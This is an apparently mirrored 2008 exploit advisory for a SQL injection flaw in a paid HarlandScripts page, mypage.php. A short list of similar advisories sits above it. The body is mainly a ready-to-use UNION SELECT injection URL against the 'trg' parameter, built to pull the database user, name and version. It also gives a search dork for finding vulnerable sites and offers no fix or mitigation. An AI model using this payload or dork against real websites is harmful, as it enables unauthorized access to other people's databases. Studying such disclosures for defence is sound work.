Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Aria-Security.com: Saba 2.0 Cross Site Scripting [PASSIVE]

PHP-Nuke  Module  BookCatalog (category&cat id) Remote SQL injection Vulnerability

IranMC  ( detail.php?Kala ) Remote SQL injection Vulnerability

PHP-Nuke Module Sectionsnew (printpage&ar tid) Remote SQL injection Vulnerability

From:	beenudel1986_(at)_gmail.com <beenudel1986_(at)_gmail.com>
Date:	01.11.2008
Subject:	harlandscripts Mypage.php Sql Injection

################################################################
#
# Author: Beenu Arora
#
# Home  : www.BeenuArora.com
#
# Email : beenudel1986@gmail.com
#
# Share the c0de!
#
################################################################
#
# Title: harlandscripts Mypage.php Sql Injection

#
# Vendor: http://www.harlandscripts.com/ ( Paid Script )

#
#
###########################################################
#
# d0rk:Powered by HarlandScripts.com
#
###########################################################

       
    
    Ex:
      
http://localhost//mypage.php?trg=1142+and+1=2+union+select+1,2,3,user(),
concat(0x3a,database()),6,7,8,9,10,11,12,13,14,15,
version(),17,18,19,20,21,22,23,24,25,26,27,28--

    

###########################################################
#
#  Bug discovered : 29 Oct.2008
###########################################################